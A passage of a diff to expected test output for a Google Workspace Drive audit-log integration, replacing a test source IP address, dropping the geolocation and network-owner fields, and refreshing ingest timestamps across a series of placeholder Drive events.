7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -46,7 +28,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -81,8 +63,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822584700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398293900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_to_folder\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_to_folder", "id": "1", @@ -101,31 +83,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -145,7 +109,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -178,8 +142,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822595800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398298100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_canceled\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_canceled", "id": "1", @@ -200,31 +164,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -244,7 +190,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -277,8 +223,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822597600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398301600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_comment_added\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_comment_added", "id": "1", @@ -299,31 +245,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -343,7 +271,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -376,8 +304,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822599200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398307700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_requested\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_requested", "id": "1", @@ -398,31 +326,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -442,7 +352,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -475,8 +385,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822600600Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398312700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"approval_reviewer_responded\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "approval_reviewer_responded", "id": "1", @@ -497,31 +407,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -541,7 +433,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -574,8 +466,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822602Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398317800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"create\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "create", "id": "1", @@ -594,31 +486,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -638,7 +512,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -671,8 +545,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822603400Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398323600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"delete\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "delete", "id": "1", @@ -691,31 +565,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -735,7 +591,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -768,8 +624,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822604800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398329300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"download\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "download", "id": "1", @@ -788,31 +644,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -832,7 +670,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -865,8 +703,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822606300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398335Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"edit\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "edit", "id": "1", @@ -885,31 +723,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -929,7 +749,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -962,8 +782,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822607700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", + "ingested": "2021-12-09T13:39:08.398340800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"add_lock\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"}]}}", "provider": "drive", "action": "add_lock", "id": "1", @@ -982,31 +802,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1026,7 +828,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1063,8 +865,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:28.822609100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", + "ingested": "2021-12-09T13:39:08.398346600Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"drive\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"access\",\"name\":\"move\",\"parameters\":[{\"name\":\"billable\",\"boolValue\":false},{\"name\":\"destination_folder_id\",\"value\":\"1234\"},{\"name\":\"destination_folder_title\",\"value\":\"folder title\"},{\"name\":\"doc_id\",\"value\":\"1234\"},{\"name\":\"doc_title\",\"value\":\"document title\"},{\"name\":\"doc_type\",\"value\":\"document\"},{\"name\":\"originating_app_id\",\"value\":\"1234\"},{\"name\":\"owner\",\"value\":\"owner@example.com\"},{\"name\":\"owner_is_shared_drive\",\"boolValue\":false},{\"name\":\"primary_event\",\"boolValue\":true},{\"name\":\"visibility\",\"value\":\"people_with_link\"},{\"name\":\"source_folder_id\",\"value\":\"1234\"},{\"name\":\"source_folder_title\",\"value\":\"a folder title\"}]}}", "provider": "drive", "action": "move", "id": "1", @@ -1083,31 +885,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - 